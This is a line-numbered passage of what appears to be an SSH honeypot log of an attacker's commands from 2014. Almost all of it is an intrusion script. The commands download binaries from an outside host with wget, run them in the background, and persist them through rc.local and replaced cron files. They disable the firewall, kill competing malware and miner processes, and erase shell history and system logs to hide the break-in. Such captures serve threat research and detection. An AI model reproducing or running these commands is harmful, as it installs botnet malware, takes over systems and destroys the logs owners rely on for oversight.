659 | cd /tmp;chmod 7777 sfewfesfs | |
660 | cd /tmp;chmod 7777 gfhjrtfyhuf | |
661 | cd /tmp;chmod 7777 rewgtf3er4t | |
662 | cd /tmp;chmod 7777 fdsfsfvff | |
663 | cd /tmp;chmod 7777 smarvtd | |
664 | cd /tmp;chmod 7777 whitptabil | |
665 | cd /tmp;chmod 7777 gdmorpen | |
666 | cd /tmp;./jdhe | |
667 | nohup /etc/sfewfesfs > /dev/null 2>&1& | |
668 | nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& | |
669 | nohup /etc/rewgtf3er4t > /dev/null 2>&1& | |
670 | nohup /etc/fdsfsfvff > /dev/null 2>&1& | |
671 | nohup /etc/smarvtd > /dev/null 2>&1& | |
672 | nohup /etc/whitptabil > /dev/null 2>&1& | |
673 | nohup /etc/gdmorpen > /dev/null 2>&1& | |
674 | nohup /etc/nhgbhhj > /dev/null 2>&1& | |
675 | nohup /etc/byv832 > /dev/null 2>&1& | |
676 | nohup /tmp/sfewfesfs > /dev/null 2>&1& | |
677 | nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& | |
678 | nohup /tmp/rewgtf3er4t > /dev/null 2>&1& | |
679 | nohup /tmp/fdsfsfvff > /dev/null 2>&1& | |
680 | nohup /tmp/smarvtd > /dev/null 2>&1& | |
681 | nohup /tmp/whitptabil > /dev/null 2>&1& | |
682 | nohup /tmp/gdmorpen > /dev/null 2>&1& | |
683 | nohup /tmp/nhgbhhj > /dev/null 2>&1& | |
684 | nohup /tmp/byv832 > /dev/null 2>&1& | |
685 | echo "cd /tmp;./sfewfesfs" >> /etc/rc.local | |
686 | echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local | |
687 | echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local | |
688 | echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local | |
689 | echo "cd /tmp;./smarvtd" >> /etc/rc.local | |
690 | echo "cd /tmp;./whitptabil" >> /etc/rc.local | |
691 | echo "cd /tmp;./gdmorpen" >> /etc/rc.local | |
692 | echo "cd /etc;./sfewfesfs" >> /etc/rc.local | |
693 | echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local | |
694 | echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local | |
695 | echo "cd /etc;./fdsfsfvff" >> /etc/rc.local | |
696 | echo "cd /etc;./smarvtd" >> /etc/rc.local | |
697 | echo "cd /etc;./whitptabil" >> /etc/rc.local | |
698 | echo "cd /etc;./gdmorpen" >> /etc/rc.local | |
699 | echo "unset MAILCHECK" >> /etc/profile | |
700 | cd /etc;chattr +i sfewfesfs | |
701 | rm -rf /root/.bash_history | |
702 | touch /root/.bash_history | |
703 | history -r | |
704 | cd /var/log > dmesg | |
705 | cd /var/log > auth.log | |
706 | cd /var/log > alternatives.log | |
707 | cd /var/log > boot.log | |
708 | cd /var/log > btmp | |
709 | cd /var/log > cron | |
710 | cd /var/log > cups | |
711 | cd /var/log > daemon.log | |
712 | cd /var/log > dpkg.log | |
713 | cd /var/log > faillog | |
714 | cd /var/log > kern.log | |
715 | cd /var/log > lastlog | |
716 | cd /var/log > maillog | |
717 | cd /var/log > user.log | |
718 | cd /var/log > Xorg.x.log | |
719 | cd /var/log > anaconda.log | |
720 | cd /var/log > yum.log | |
721 | cd /var/log > secure | |
722 | cd /var/log > wtmp | |
723 | cd /var/log > utmp | |
724 | cd /var/log > messages | |
725 | cd /var/log > spooler | |
726 | cd /var/log > sudolog | |
727 | cd /var/log > aculog | |
728 | cd /var/log > access-log | |
729 | cd /root > .bash_history | |
730 | history -c" | |
731 | 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop | |
732 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
733 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf | |
734 | apt-get -y install wget | |
735 | yum -y install wget | |
736 | chmod 7777 / etc | |
737 | killall -9 .IptabLes | |
738 | killall -9 nfsd4 | |
739 | killall -9 profild.key | |
740 | cd /etc;rm -rf dir fake.cfg | |
741 | killall -9 nfsd | |
742 | killall -9 DDosl | |
743 | killall -9 lengchao32 | |
744 | killall -9 b26 | |
745 | killall -9 khelper | |
746 | killall -9 Bill | |
747 | killall -9 n26 | |
748 | killall -9 007 | |
749 | killall -9 codelove | |
750 | killall -9 32 | |
751 | killall -9 m32 | |
752 | killall -9 m64 | |
753 | killall -9 64 | |
754 | killall -9 83BOT | |
755 | killall -9 82BOT | |
756 | killall -9 dos64 | |
757 | killall -9 dos32 | |
758 | killall -9 new6 | |
759 | killall -9 new4 | |
760 | killall -9 node24 | |
761 | killall -9 mimi | |
762 | killall -9 nodeJR-1 | |
763 | killall -9 freeBSD | |
764 | killall -9 ksapdd | |
765 | killall -9 106 | |
766 | killall -9 09 | |
767 | killall -9 xsw | |
768 | killall -9 syslogd | |
769 | killall -9 skysapdd | |
770 | killall -9 cupsddd | |
771 | killall -9 ksapd | |
772 | killall -9 atddd | |
773 | killall -9 xfsdxd | |
774 | killall -9 sfewfesfs | |
775 | killall -9 gfhjrtfyhuf | |
776 | killall -9 rewgtf3er4t | |
777 | killall -9 fdsfsfvff | |
778 | killall -9 smarvtd | |
779 | killall -9 whitptabil | |
780 | killall -9 gdmorpen | |
781 | cd /etc;chattr -i 66 | |
782 | cd /root; chmod 7777 / etc | |
783 | killall -9 minerd | |
784 | killall -9 syn | |
785 | killall -9 joudckfr | |
786 | killall -9 www | |
787 | killall -9 log | |
788 | killall -9 .IptabLes | |
789 | killall -9 .IptabLex | |
790 | killall -9 .Mm2 | |
791 | killall -9 acpid | |
792 | killall -9 m64 | |
793 | killall -9 ./QQ | |
794 | killall -9 aabb | |
795 | killall -9 g3 | |
796 | killall -9 S99local | |
797 | killall -9 3 | |
798 | killall -9 pm | |
799 | killall -9 qweasd | |
800 | killall -9 tangtang | |
801 | killall -9 imap-login | |
802 | killall -9 xudp | |
803 | killall -9 sshpa | |
804 | killall -9 008 | |
805 | killall -9 txma | |
806 | killall -9 mrdos64.b00 | |
807 | killall -9 mrdos32.b00 | |
808 | killall -9 kkpklp | |
809 | killall -9 kiilp | |
810 | killall -9 xin1 | |
811 | killall -9 jibateng | |
812 | killall -9 syscore.sh | |
813 | killall -9 syscore.sh | |
814 | killall -9 syscore.sh | |
815 | killall -9 .mimeo | |
816 | killall -9 .mimeo | |
817 | killall -9 .mimeo | |
818 | killall -9 .mimeop | |
819 | killall -9 .task1 | |
820 | killall -9 .mimeop | |
821 | killall -9 .IptabLes | |
822 | killall -9 .IptabLex | |
823 | killall -9 .IptabLes | |
824 | killall -9 .IptabLex | |
825 | killall -9 .IptabLes | |
826 | killall -9 .IptabLex | |
827 | killall -9 .IptabLes | |
828 | killall -9 .IptabLex | |
829 | cd /root;rm -rf dir nohup.out | |
830 | cd /etc;rm -rf dir fake.cfg | |
831 | cd /etc;rm -rf dir cupsddd.* | |
832 | cd /etc;rm -rf dir atddd.* | |
833 | cd /etc;rm -rf dir ksapdd.* | |
834 | cd /etc;rm -rf dir kysapdd.* | |
835 | cd /etc;rm -rf dir sksapdd.* | |
836 | cd /etc;rm -rf dir skysapdd.* | |
837 | cd /etc;rm -rf dir xfsdxd.* | |
838 | cd /etc;rm -rf dir fake.cfg | |
839 | cd /etc;rm -rf dir cupsdd.* | |
840 | cd /etc;rm -rf dir atdd.* | |
841 | cd /etc;rm -rf dir ksapd.* | |
842 | cd /etc;rm -rf dir kysapd.* | |
843 | cd /etc;rm -rf dir sksapd.* | |
844 | cd /etc;rm -rf dir skysapd.* | |
845 | cd /etc;rm -rf dir xfsdx.* | |
846 | cd /etc;rm -rf dir sfewfesfs | |
847 | cd /etc;rm -rf dir gfhjrtfyhuf | |
848 | cd /etc;rm -rf dir rewgtf3er4t | |
849 | cd /etc;rm -rf dir fdsfsfvff | |
850 | cd /etc;rm -rf dir smarvtd | |
851 | cd /etc;rm -rf dir whitptabil | |
852 | cd /etc;rm -rf dir gdmorpen | |
853 | cd /etc;rm -rf dir sfewfesfs.* | |
854 | cd /etc;rm -rf dir gfhjrtfyhuf.* | |
855 | cd /etc;rm -rf dir rewgtf3er4t.* | |
856 | cd /etc;rm -rf dir fdsfsfvff.* | |
857 | cd /etc;rm -rf dir smarvtd.* | |
858 | cd /etc;rm -rf dir whitptabil.* | |
859 | cd /etc;rm -rf dir gdmorpen.* | |
860 | cd /etc;rm -rf dir nhgbhhj.* | |
861 | cd /tmp;rm -rf dir 1.* | |
862 | cd /tmp;rm -rf dir 2.* | |
863 | cd /tmp;rm -rf dir 3.* | |
864 | cd /tmp;rm -rf dir 4.* | |
865 | cd /tmp;rm -rf dir 5.* | |
866 | cd /tmp;rm -rf dir jdhe | |
867 | cd /tmp;rm -rf dir jdhe.* | |
868 | cd /var/spool/cron; rm -rf dir root.* | |
869 | cd /var/spool/cron; rm -rf dir root | |
870 | cd /var/spool/cron/crontabs; rm -rf dir root.* | |
871 | cd /var/spool/cron/crontabs; rm -rf dir root | |
872 | cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root | |
873 | cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root | |
874 | yes|mv /tmp/root /var/spool/cron | |
875 | yes|mv /tmp/root /var/spool/cron/crontabs | |
876 | cd /tmp;wget -c http://www.frade8c.com:9162/jdhe | |
877 | cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs | |
878 | cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf | |
879 | cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t | |
880 | cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff | |
881 | cd /etc;wget -c http://www.frade8c.com:9162/smarvtd | |
882 | cd /etc;wget -c http://www.frade8c.com:9162/whitptabil | |
883 | cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen | |
884 | cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj |